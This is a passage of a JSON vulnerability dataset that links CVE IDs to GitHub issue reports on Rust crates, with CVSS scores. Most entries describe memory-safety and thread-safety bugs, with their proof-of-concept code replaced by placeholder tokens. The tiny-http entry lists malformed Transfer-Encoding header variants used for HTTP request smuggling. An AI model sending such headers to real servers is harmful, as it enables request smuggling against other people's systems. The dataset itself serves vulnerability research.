  85362. "Issue_Url_old": "https://github.com/vertexclique/lever/issues/15",
  85363. "Issue_Url_new": "https://github.com/vertexclique/lever/issues/15",
  85364. "Repo_new": "vertexclique/lever",
  85365. "Issue_Created_At": "2020-11-10T16:44:10Z",
  85366. "description": "APITAG should have bounds on its APITAG traits. Currently APITAG implements the APITAG traits unconditionally: URLTAG I think this should only be when APITAG and APITAG respectively. Otherwise, this makes it possible to send across types that aren't safe to use across threads such as Cell s. Here's a demonstration that causes a data race: ERRORTAG This outputs: APITAG",
  85367. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85368. "severity": "HIGH",
  85369. "baseScore": 8.1,
  85370. "impactScore": 5.9,
  85371. "exploitabilityScore": 2.2
  85372. },
  85373. {
  85374. "CVE_ID": "CVE-2020-36444",
  85375. "Issue_Url_old": "https://github.com/google/rust-async-coap/issues/33",
  85376. "Issue_Url_new": "https://github.com/google/rust-async-coap/issues/33",
  85377. "Repo_new": "google/rust-async-coap",
  85378. "Issue_Created_At": "2020-12-08T20:46:21Z",
  85379. "description": "APITAG Send and Sync should have bounds on RC. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Send and Sync so long as APITAG and APITAG . URLTAG However, this should also probably be bounded by APITAG and APITAG , otherwise it's possible to smuggle across non Send types across thread boundaries. Here's a proof of concept that segfaults safe rust code: ERRORTAG Output: APITAG",
  85380. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85381. "severity": "HIGH",
  85382. "baseScore": 8.1,
  85383. "impactScore": 5.9,
  85384. "exploitabilityScore": 2.2
  85385. },
  85386. {
  85387. "CVE_ID": "CVE-2020-35884",
  85388. "Issue_Url_old": "https://github.com/tiny-http/tiny-http/issues/173",
  85389. "Issue_Url_new": "https://github.com/tiny-http/tiny-http/issues/173",
  85390. "Repo_new": "tiny-http/tiny-http",
  85391. "Issue_Created_At": "2020-06-16T11:17:22Z",
  85392. "description": "HTTP Request Smuggling Hardening. Posting it here for community patches after talking with the maintainers privately. Issue: tiny http doesn't prevent Request Smuggling attacks (CE:TL,TL:TL) where a frontend proxy might allow/pass malformed Transfer Encoding headers but tiny http will normalise them Steps to Reproduce Use a vulnerable version of APITAG in the following setup ( URLTAG as a frontend Use an example framework such as Rouille (which uses tiny http) ( FILETAG as a backend Now send a request similar to the following ERRORTAG In the above example, the request is sent with the Transfer encoding header having extra spaces APITAG Encoding : chunked). This is in violation of RFC NUMBERTAG tiny http is normalizing the ERRORTAG header, hence we get the below reponse. ERRORTAG More variations of this exist: ` Transfer Encoding: \"chunked\" Transfer Encoding: chunked Transfer Encoding: 'chunked' Transfer Encoding: chunk Transfer Encoding: chunked\u000b Transfer Encoding: chunked\u007f Transfer Encoding:",
  85393. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  85394. "severity": "MEDIUM",
  85395. "baseScore": 6.5,
  85396. "impactScore": 2.5,
  85397. "exploitabilityScore": 3.9
  85398. },
  85399. {
  85400. "CVE_ID": "CVE-2021-28306",
  85401. "Issue_Url_old": "https://github.com/MoAlyousef/fltk-rs/issues/519",
  85402. "Issue_Url_new": "https://github.com/fltk-rs/fltk-rs/issues/519",
  85403. "Repo_new": "fltk-rs/fltk-rs",
  85404. "Issue_Created_At": "2021-02-18T20:48:04Z",
  85405. "description": "[BUG] APITAG causes segmentation fault. Setting the label type of a widget to APITAG causes segmentation fault. Here is code to reproduce: ERRORTAG Expected behavior I have no idea what Multi label type does, I was just experimenting. Meta info OS: Arch Linu NUMBERTAG FLTKL Version NUMBERTAG",
  85406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85407. "severity": "HIGH",
  85408. "baseScore": 7.5,
  85409. "impactScore": 3.6,
  85410. "exploitabilityScore": 3.9
  85411. },
  85412. {
  85413. "CVE_ID": "CVE-2020-36205",
  85414. "Issue_Url_old": "https://github.com/rtbo/rust-xcb/issues/93",
  85415. "Issue_Url_new": "https://github.com/rtbo/rust-xcb/issues/93",
  85416. "Repo_new": "rtbo/rust-xcb",
  85417. "Issue_Created_At": "2020-12-10T19:35:59Z",
  85418. "description": "Soundness issue with ERRORTAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that xcb exports the ERRORTAG struct publicly: URLTAG Since the struct and its fields are public, it can be created from safe Rust code which can potentially leading to use after frees and double frees. Maybe this struct should have a hidden constructor or be marked ERRORTAG ? Here's a proof of concept showing a use after free with this struct: ERRORTAG This outputs: CODETAG",
  85419. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85420. "severity": "MEDIUM",
  85421. "baseScore": 5.5,
  85422. "impactScore": 3.6,
  85423. "exploitabilityScore": 1.8
  85424. },
  85425. {
  85426. "CVE_ID": "CVE-2020-36205",
  85427. "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/93",
  85428. "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/93",
  85429. "Repo_new": "rust-x-bindings/rust-xcb",
  85430. "Issue_Created_At": "2020-12-10T19:35:58Z",
  85431. "description": "Soundness issue with ERRORTAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that xcb exports the ERRORTAG struct publicly: URLTAG Since the struct and its fields are public, it can be created from safe Rust code which can potentially leading to use after frees and double frees. Maybe this struct should have a hidden constructor or be marked ERRORTAG ? Here's a proof of concept showing a use after free with this struct: ERRORTAG This outputs: CODETAG",
  85432. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85433. "severity": "MEDIUM",
  85434. "baseScore": 5.5,
  85435. "impactScore": 3.6,
  85436. "exploitabilityScore": 1.8
  85437. },
  85438. {
  85439. "CVE_ID": "CVE-2020-36210",
  85440. "Issue_Url_old": "https://github.com/mersinvald/autorand-rs/issues/5",
  85441. "Issue_Url_new": "https://github.com/mersinvald/autorand-rs/issues/5",
  85442. "Repo_new": "mersinvald/autorand-rs",
  85443. "Issue_Created_At": "2021-01-01T04:08:05Z",
  85444. "description": "impl Random on arrays can lead to dropping uninitialized memory. Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG can potentially panic (since Random is a public trait and users can implement it on custom types) and if it does, the partially initialized array is dropped. Thus APITAG can be invoked on uninitialized memory, leading to undefined behavior. Thank you for reviewing this issue NUMBERTAG",
  85445. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  85446. "severity": "HIGH",
  85447. "baseScore": 7.8,
  85448. "impactScore": 5.9,
  85449. "exploitabilityScore": 1.8
  85450. },
  85451. {
  85452. "CVE_ID": "CVE-2020-36211",
  85453. "Issue_Url_old": "https://github.com/Devolutions/gfwx-rs/issues/7",
  85454. "Issue_Url_new": "https://github.com/devolutions/gfwx-rs/issues/7",
  85455. "Repo_new": "devolutions/gfwx-rs",
  85456. "Issue_Created_At": "2020-12-08T07:10:42Z",
  85457. "description": "APITAG needs bounds on its Send and Sync traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Send and Sync for all types: URLTAG However, this should probably be bound by APITAG and APITAG respectively. I realize this is an image library and the T will likely be a numeric type but without these bounds its possible to create data races from safe rust code and cause memory safety issues. Here's a rather contrived example where an \"image\" is backed by Cells causing a segfault from safe rust code: ERRORTAG Output: APITAG",
  85458. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  85459. "severity": "HIGH",
  85460. "baseScore": 7.0,
  85461. "impactScore": 5.9,
  85462. "exploitabilityScore": 1.0
  85463. },
  85464. {
  85465. "CVE_ID": "CVE-2020-36442",
  85466. "Issue_Url_old": "https://github.com/maciejhirsz/beef/issues/37",
  85467. "Issue_Url_new": "https://github.com/maciejhirsz/beef/issues/37",
  85468. "Repo_new": "maciejhirsz/beef",
  85469. "Issue_Created_At": "2020-10-28T06:26:02Z",
  85470. "description": "APITAG lacks a Sync bound on its Send trait allowing for data races. I think the impl for Send on Cow should be bounded by APITAG or Sync like it is for references URLTAG and the APITAG itself URLTAG . URLTAG Without this it's possible to create references to a non Sync object like Cell through the use of a borrowed Cow. For example, consider the following program (uses APITAG to make dealing with threads easier): ERRORTAG This produces the output: APITAG While this example is pretty benign, here's how it can lead to a null pointer dereference from safe rust code: APITAG APITAG to expand code snippet APITAG ERRORTAG APITAG This example produces: APITAG",
  85471. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85472. "severity": "HIGH",
  85473. "baseScore": 8.1,
  85474. "impactScore": 5.9,
  85475. "exploitabilityScore": 2.2
  85476. },
  85477. {
  85478. "CVE_ID": "CVE-2020-35862",
  85479. "Issue_Url_old": "https://github.com/myrrlyn/bitvec/issues/55",
  85480. "Issue_Url_new": "https://github.com/ferrilab/bitvec/issues/55",
  85481. "Repo_new": "ferrilab/bitvec",
  85482. "Issue_Created_At": "2020-03-27T20:21:13Z",
  85483. "description": "Possible issue shrinking APITAG First, thank you for bitvec . I found a strange problem (freeing of unallocated memory) when shrinking a APITAG to a APITAG , but I can reproduce it only on macos. I have a hunch the problem may not be in bitvec at all, but possibly in something Rust specific. Any guidance will be appreciated. I created a reproducible minimal testcase in kulp/bitvec debugging URLTAG . Github Actions shows failure on macos URLTAG , whereas Ubuntu succeeds URLTAG (the Windows job URLTAG tends to be canceled because it does not finish before macos fails). On my Mac OS NUMBERTAG machine, test failure (with bitvec NUMBERTAG looks like this : ERRORTAG A backtrace URLTAG from ERRORTAG shows APITAG occurring during APITAG . The dynamically nearest bitvec code is this : ERRORTAG I wrote FILETAG that demonstrates the problem exists URLTAG across a broad swathe of Rust versions and bitvec versions. All NUMBERTAG ersions of Rust from NUMBERTAG through NUMBERTAG and all NUMBERTAG ersions of bitvec from NUMBERTAG through NUMBERTAG and NUMBERTAG as well) demonstrate the issue. For the real code in which this issue was first discovered, my only workaround is to switch to Linux, which is possible for the short term but rather worrying. Do you think it plausible that this is a Rust compiler or library issue ? if so, can you suggest a plan of attack for chasing it down further, or reporting it elsewhere ?",
  85484. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85485. "severity": "CRITICAL",
  85486. "baseScore": 9.8,
  85487. "impactScore": 5.9,
  85488. "exploitabilityScore": 3.9
  85489. },
  85490. {
  85491. "CVE_ID": "CVE-2020-36213",
  85492. "Issue_Url_old": "https://github.com/rodrimati1992/abi_stable_crates/issues/44",
  85493. "Issue_Url_new": "https://github.com/rodrimati1992/abi_stable_crates/issues/44",
  85494. "Repo_new": "rodrimati1992/abi_stable_crates",
  85495. "Issue_Created_At": "2020-12-21T06:39:13Z",
  85496. "description": "Update unsound APITAG and APITAG Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. URLTAG URLTAG These two implementations are copy pasted from Rust's standard library, and unfortunately it turns out that std implementations were containing soundness bugs (rust lang/rust NUMBERTAG and rust lang/rust NUMBERTAG respectively). Could you check them and update the respective part of this crate?",
  85497. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85498. "severity": "HIGH",
  85499. "baseScore": 7.5,
  85500. "impactScore": 3.6,
  85501. "exploitabilityScore": 3.9
  85502. },
  85503. {
  85504. "CVE_ID": "CVE-2020-36455",
  85505. "Issue_Url_old": "https://github.com/BrokenLamp/slock-rs/issues/2",
  85506. "Issue_Url_new": "https://github.com/brokenlamp/slock-rs/issues/2",
  85507. "Repo_new": "brokenlamp/slock-rs",
  85508. "Issue_Created_At": "2020-11-17T06:45:09Z",
  85509. "description": "Slock APITAG allows sending non Send types across thread boundaries. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that Slock implements Send and Sync for all types: URLTAG This should probably be bounded by APITAG just like the FILETAG , otherwise this allows sending non Send types across thread boundaries which may invoke undefined behavior. Here's an example of this in action with an Rc segfaulting safe Rust code. Built with APITAG with APITAG feature enabled: ERRORTAG This outputs: APITAG",
  85510. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85511. "severity": "HIGH",
  85512. "baseScore": 8.1,
  85513. "impactScore": 5.9,
  85514. "exploitabilityScore": 2.2
  85515. },
  85516. {
  85517. "CVE_ID": "CVE-2021-45705",
  85518. "Issue_Url_old": "https://github.com/Absolucy/nanorand-rs/issues/28",
  85519. "Issue_Url_new": "https://github.com/absolucy/nanorand-rs/issues/28",
  85520. "Repo_new": "absolucy/nanorand-rs",
  85521. "Issue_Created_At": "2021-07-10T22:52:06Z",
  85522. "description": "Aliased mutable references with APITAG . Due to the implementation of APITAG & APITAG , the following code is unsound: ERRORTAG",
  85523. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85524. "severity": "CRITICAL",
  85525. "baseScore": 9.8,
  85526. "impactScore": 5.9,
  85527. "exploitabilityScore": 3.9
  85528. },
  85529. {
  85530. "CVE_ID": "CVE-2020-36208",
  85531. "Issue_Url_old": "https://github.com/oliver-giersch/conquer-once/issues/3",
  85532. "Issue_Url_new": "https://github.com/oliver-giersch/conquer-once/issues/3",
  85533. "Repo_new": "oliver-giersch/conquer-once",
  85534. "Issue_Created_At": "2020-12-23T00:31:47Z",
  85535. "description": "APITAG can send APITAG && Sync) objects across thread boundaries. Hello :crab: , we APITAG group APITAG gatech) found an undefined behavior issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Sync impl of APITAG By exploiting the fact that T has no Send bound, it is possible to make APITAG send a non Send object across thread boundaries. ERRORTAG Proof of Concept I prepared a small example that sends APITAG across thread boundaries using APITAG . ERRORTAG Suggested Fix Adding a Send bound to T as following will allow the compiler to revoke the example program above. ERRORTAG Thank you for checking out this issue NUMBERTAG",
  85536. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  85537. "severity": "HIGH",
  85538. "baseScore": 7.8,
  85539. "impactScore": 5.9,
  85540. "exploitabilityScore": 1.8
  85541. },
  85542. {
  85543. "CVE_ID": "CVE-2020-36456",
  85544. "Issue_Url_old": "https://github.com/ratel-rust/toolshed/issues/12",
  85545. "Issue_Url_new": "https://github.com/ratel-rust/toolshed/issues/12",
  85546. "Repo_new": "ratel-rust/toolshed",
  85547. "Issue_Created_At": "2020-11-15T07:17:28Z",
  85548. "description": "APITAG allows synchronous use of non Sync types through references. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements Send as long as the underlying type implements Copy . However, one potential problem with this is that (non mutable) references actually implement the Copy trait: URLTAG This makes it possible, for example, to share Cell s across threads by wrapping them in a APITAG : ERRORTAG Output: APITAG Indicating that the same Cell is now usable across threads, potentially allowing for data races.",
  85549. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85550. "severity": "HIGH",
  85551. "baseScore": 8.1,
  85552. "impactScore": 5.9,
  85553. "exploitabilityScore": 2.2
  85554. },
  85555. {
  85556. "CVE_ID": "CVE-2021-25904",
  85557. "Issue_Url_old": "https://github.com/rust-av/rust-av/issues/136",
  85558. "Issue_Url_new": "https://github.com/rust-av/rust-av/issues/136",
  85559. "Repo_new": "rust-av/rust-av",
  85560. "Issue_Created_At": "2021-01-07T17:26:49Z",
  85561. "description": "APITAG can lead to segfault without ERRORTAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description Since APITAG URLTAG doesn't validate its input pointers, it is possible to trigger undefined behavior without using ERRORTAG . Proof of Concept The example program below exhibits segmentation fault caused by dereferncing a null pointer. CODETAG Program Output APITAG NUMBERTAG rustc NUMBERTAG nightly) APITAG Suggested Fix APITAG API could be changed to an ERRORTAG API, since it requires users to check the validity of the input pointers in order to maintain safety guarantees. Thank you for checking out this issue NUMBERTAG",
  85562. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85563. "severity": "HIGH",
  85564. "baseScore": 7.5,
  85565. "impactScore": 3.6,
  85566. "exploitabilityScore": 3.9
  85567. },
  85568. {
  85569. "CVE_ID": "CVE-2020-35863",
  85570. "Issue_Url_old": "https://github.com/hyperium/hyper/issues/1925",
  85571. "Issue_Url_new": "https://github.com/hyperium/hyper/issues/1925",
  85572. "Repo_new": "hyperium/hyper",
  85573. "Issue_Created_At": "2019-09-04T19:34:15Z",
  85574. "description": "Client GET requests with transfer encoding are wrongly stripped. The client wrongly strips ERRORTAG from GET requests, thinking that GET requests shouldn't have payloads. However, FILETAG : > A payload within a GET request message has no defined semantics; > sending a payload body on a GET request might cause some existing > implementations to reject the request. The original implementation was trying to protect from empty APITAG s automatically adding ERRORTAG to a GET request. The fix should probably still protect against that, but if the APITAG header has been explicitly set on the Request , it should be forwarded as is.",
  85575. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85576. "severity": "CRITICAL",
  85577. "baseScore": 9.8,
  85578. "impactScore": 5.9,
  85579. "exploitabilityScore": 3.9
  85580. },
  85581. {
  85582. "CVE_ID": "CVE-2020-35861",
  85583. "Issue_Url_old": "https://github.com/fitzgen/bumpalo/issues/69",
  85584. "Issue_Url_new": "https://github.com/fitzgen/bumpalo/issues/69",
  85585. "Repo_new": "fitzgen/bumpalo",
  85586. "Issue_Created_At": "2020-03-24T05:30:26Z",
  85587. "description": "segfault only in unit test. I'm very confusing current status and don't know what is wrong when I run this code in unit test with cargo test it failed with SIGSEGV Here is my test code URLTAG FILETAG but when I run same code in APITAG then it success FILETAG",
  85588. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85589. "severity": "HIGH",
  85590. "baseScore": 7.5,
  85591. "impactScore": 3.6,
  85592. "exploitabilityScore": 3.9
  85593. },
  85594. {
  85595. "CVE_ID": "CVE-2021-25903",
  85596. "Issue_Url_old": "https://github.com/krl/cache/issues/2",
  85597. "Issue_Url_new": "https://github.com/krl/cache/issues/2",
  85598. "Repo_new": "krl/cache",
  85599. "Issue_Created_At": "2021-01-01T10:55:50Z",
  85600. "description": "Exposing internally stored raw pointers is unsafe. Hi, this segfaults with only \"safe\" code (i.e. not using ERRORTAG ): ERRORTAG May I suggest you yank URLTAG your crate? I think it is bad a crate with such basic issues (also see NUMBERTAG is available under the very exposed crate name cache . You could still use your crate outside of the registry by referencing the git repository URLTAG .",
  85601. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85602. "severity": "HIGH",
  85603. "baseScore": 7.5,
  85604. "impactScore": 3.6,
  85605. "exploitabilityScore": 3.9
  85606. },
  85607. {
  85608. "CVE_ID": "CVE-2021-29939",
  85609. "Issue_Url_old": "https://github.com/Alexhuszagh/rust-stackvector/issues/2",
  85610. "Issue_Url_new": "https://github.com/alexhuszagh/rust-stackvector/issues/2",
  85611. "Repo_new": "alexhuszagh/rust-stackvector",
  85612. "Issue_Created_At": "2021-02-19T15:31:01Z",
  85613. "description": "Memory safety issue in APITAG . Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in APITAG , the APITAG 's upper bound is used authoritatively to verify the capacity and then up to APITAG elements are inserted directly into the APITAG : URLTAG However, if an Iterator incorrectly reports a APITAG here with an upper bound smaller than the lower bound, it can cause that first loop to write beyond the capacity of the stack and overwrite the stack. Here's an example: ERRORTAG This outputs: CODETAG As per the APITAG documentation URLTAG : > It is not enforced that an iterator implementation yields the declared number of elements. A buggy iterator may yield less than the lower bound or more than the upper bound of elements. > APITAG is primarily intended to be used for optimizations such as reserving space for the elements of the iterator, but must not be trusted to e.g., omit bounds checks in unsafe code. An incorrect implementation of APITAG should not lead to memory safety violations.",
  85614. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  85615. "severity": "HIGH",
  85616. "baseScore": 7.3,
  85617. "impactScore": 3.4,
  85618. "exploitabilityScore": 3.9
  85619. },
  85620. {
  85621. "CVE_ID": "CVE-2020-35882",
  85622. "Issue_Url_old": "https://github.com/SergioBenitez/Rocket/issues/1312",
  85623. "Issue_Url_new": "https://github.com/sergiobenitez/rocket/issues/1312",
  85624. "Repo_new": "sergiobenitez/rocket",
  85625. "Issue_Created_At": "2020-05-27T05:48:51Z",
  85626. "description": "Clone implementation for APITAG is unsound. The Bug APITAG is one of a few places that Rocket uses unsafe Rust. While auditing the code, I found that its Clone implementation is unsound. First, let's look at the definition of APITAG which implements a mutable Rc with a raw pointer: URLTAG The comment justifies that it is safe to have APITAG and APITAG which share the same Request pointer because modification from APITAG is not observable from APITAG However, APITAG Clone implementation allows to create two APITAG that share the same Request raw pointer, which was not part of the justification: URLTAG This ultimately permits the violation of aliasing rule with two APITAG instances that point to the same Request instance. Proof of Concept APITAG code: ERRORTAG Output: ERRORTAG The APITAG was tested on the following environment: Rocket NUMBERTAG latest at the time of writing) OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG nightly (a NUMBERTAG d NUMBERTAG d NUMBERTAG Target NUMBERTAG unknown linux gnu The APITAG used a classic iterator invalidation to show it is possible to overwrite a pointer and a length of a string slice. Is this a security bug? Considering that NUMBERTAG APITAG is intended to be used for testing NUMBERTAG The exact pattern to trigger the bug is unlikely to happen in the wild I believe the security impact of this bug is minimal. I think It is still worthwhile to file a APITAG advisory after the bug confirmation considering the people who want to be notified about unsound APIs URLTAG . Possible Fixes I believe APITAG can be redesigned without breaking APITAG API with safe alternatives such as APITAG URLTAG or APITAG URLTAG . I think it is also possible to fix Clone to clone the internal Request, but the first solution which reduces the number of unsafe code should be preferred if possible.",
  85627. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85628. "severity": "HIGH",
  85629. "baseScore": 8.1,
  85630. "impactScore": 5.9,
  85631. "exploitabilityScore": 2.2
  85632. },
  85633. {
  85634. "CVE_ID": "CVE-2019-16882",
  85635. "Issue_Url_old": "https://github.com/Robbepop/string-interner/issues/9",
  85636. "Issue_Url_new": "https://github.com/robbepop/string-interner/issues/9",
  85637. "Repo_new": "robbepop/string-interner",
  85638. "Issue_Created_At": "2019-08-24T15:00:52Z",
  85639. "description": "Unsoundness (use after free) around APITAG and APITAG . Abstract By steps below, call to APITAG and APITAG cause use after free in APITAG NUMBERTAG Create a APITAG . I'll call it old NUMBERTAG Intern some string NUMBERTAG Clone old . I'll call the newly created interner old . + APITAG NUMBERTAG Drop old . + At this point, all APITAG s in APITAG is also going to be dropped NUMBERTAG Call APITAG or APITAG , passing same string as before. + These functions refer APITAG strings already dropped. This is UB. Code to reproduce CODETAG ERRORTAG The last APITAG should never fail, but it failed in my environment. APITAG is UB so it might success coincidentally...) See APITAG for more detailed explanation.",
  85640. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85641. "severity": "HIGH",
  85642. "baseScore": 7.5,
  85643. "impactScore": 3.6,
  85644. "exploitabilityScore": 3.9
  85645. },
  85646. {
  85647. "CVE_ID": "CVE-2020-35898",
  85648. "Issue_Url_old": "https://github.com/actix/actix-net/issues/160",
  85649. "Issue_Url_new": "https://github.com/actix/actix-net/issues/160",
  85650. "Repo_new": "actix/actix-net",
  85651. "Issue_Created_At": "2020-07-19T23:36:06Z",
  85652. "description": "Custom Cell implementation is unsound. Right now there is no mechanism in Cell to track whether a mutable reference to the data is already acquired. Thus it is possible to obtain several mutable references to the same memory location by calling APITAG repeatedly: CODETAG This may result in pretty much arbitrary memory corruption, most likely a use after free. Even though no code internal to Actix makes two obvious calls to APITAG in a row, this behavior has been shown to be exploitable from the public API (see APITAG that fails MIRI URLTAG . PR NUMBERTAG has removed one instance of this Cell and all uses of it. However, there is another copy of it in the repository in APITAG crate, and there are NUMBERTAG calls to APITAG . The obvious fix is to replace all uses of custom APITAG with APITAG (the way it was before the introduction of a custom cell in APITAG like it was done in NUMBERTAG",
  85653. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  85654. "severity": "CRITICAL",
  85655. "baseScore": 9.1,
  85656. "impactScore": 5.2,
  85657. "exploitabilityScore": 3.9
  85658. },
  85659. {
  85660. "CVE_ID": "CVE-2020-35874",
  85661. "Issue_Url_old": "https://github.com/droundy/internment/issues/11",
  85662. "Issue_Url_new": "https://github.com/droundy/internment/issues/11",
  85663. "Repo_new": "droundy/internment",
  85664. "Issue_Created_At": "2020-04-24T07:58:21Z",
  85665. "description": "Possible race condition in APITAG .. I believe this function has a potential race condition: URLTAG If a concurrent thread creates a new APITAG with the same value as the one being destroyed after we drop the ref count but before we take the mutex, then removing an entry from the map creates a dangling pointer.",
  85666. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85667. "severity": "HIGH",
  85668. "baseScore": 8.1,
  85669. "impactScore": 5.9,
  85670. "exploitabilityScore": 2.2
  85671. },
  85672. {
  85673. "CVE_ID": "CVE-2020-35885",
  85674. "Issue_Url_old": "https://github.com/pigeonhands/rust-arch/issues/2",
  85675. "Issue_Url_new": "https://github.com/pigeonhands/rust-arch/issues/2",
  85676. "Repo_new": "pigeonhands/rust-arch",
  85677. "Issue_Created_At": "2020-08-20T06:34:53Z",
  85678. "description": "APITAG deallocates a memory region that it doesn't own. URLTAG Description APITAG deallocates a memory region that it doesn't own when APITAG is created without using APITAG . This can introduce memory safety issues such as double free and use after free into client programs. Demonstration Crate: alpm rs Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG d3fb NUMBERTAG a NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85679. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85680. "severity": "CRITICAL",
  85681. "baseScore": 9.8,
  85682. "impactScore": 5.9,
  85683. "exploitabilityScore": 3.9
  85684. },
  85685. {
  85686. "CVE_ID": "CVE-2021-29938",
  85687. "Issue_Url_old": "https://github.com/gnzlbg/slice_deque/issues/90",
  85688. "Issue_Url_new": "https://github.com/gnzlbg/slice_deque/issues/90",
  85689. "Repo_new": "gnzlbg/slice_deque",
  85690. "Issue_Created_At": "2021-02-19T07:27:40Z",
  85691. "description": "Panic safety issue in APITAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a panic safety issue in the APITAG returned by the APITAG function: URLTAG Notably, the code increments APITAG _before_ it calls APITAG which can potentially panic. This means for example, that it can leave the APITAG in an inconsistent state resulting in a double drop. Here is an example: ERRORTAG This outputs: CODETAG",
  85692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85693. "severity": "HIGH",
  85694. "baseScore": 7.5,
  85695. "impactScore": 3.6,
  85696. "exploitabilityScore": 3.9
  85697. },
  85698. {
  85699. "CVE_ID": "CVE-2020-35895",
  85700. "Issue_Url_old": "https://github.com/arcnmx/stack-rs/issues/4",
  85701. "Issue_Url_new": "https://github.com/arcnmx/stack-rs/issues/4",
  85702. "Repo_new": "arcnmx/stack-rs",
  85703. "Issue_Created_At": "2020-09-24T09:59:13Z",
  85704. "description": "Missing check in APITAG leads to out of bounds write. APITAG allows insertion of an element into the array object at the specified index. Due to a missing check on the upper bound of this index, it is possible to write out of bounds. ERRORTAG Issue number NUMBERTAG is pointed out in NUMBERTAG",
  85705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85706. "severity": "CRITICAL",
  85707. "baseScore": 9.8,
  85708. "impactScore": 5.9,
  85709. "exploitabilityScore": 3.9
  85710. },
  85711. {
  85712. "CVE_ID": "CVE-2020-36472",
  85713. "Issue_Url_old": "https://github.com/edarc/max7301/issues/1",
  85714. "Issue_Url_new": "https://github.com/edarc/max7301/issues/1",
  85715. "Repo_new": "edarc/max7301",
  85716. "Issue_Created_At": "2020-12-19T00:05:47Z",
  85717. "description": "Unsound Sync implementation for APITAG and APITAG . Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG URLTAG APITAG and APITAG implement Sync for APITAG . This bound is seemingly unsound; it allows sending a reference to APITAG or APITAG to another thread, and from there a mutable reference to APITAG can be obtained through APITAG APIs. This could result in a thread safety violation when EI is a non Send type. We suggest adding an APITAG bound (or an equivalent APITAG bound) to those Sync implementations, following the stdlib Mutex's Sync implementation URLTAG .",
  85718. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85719. "severity": "MEDIUM",
  85720. "baseScore": 5.9,
  85721. "impactScore": 3.6,
  85722. "exploitabilityScore": 2.2
  85723. },
  85724. {
  85725. "CVE_ID": "CVE-2018-20996",
  85726. "Issue_Url_old": "https://github.com/crossbeam-rs/crossbeam-epoch/issues/82",
  85727. "Issue_Url_new": "https://github.com/crossbeam-rs/crossbeam-epoch/issues/82",
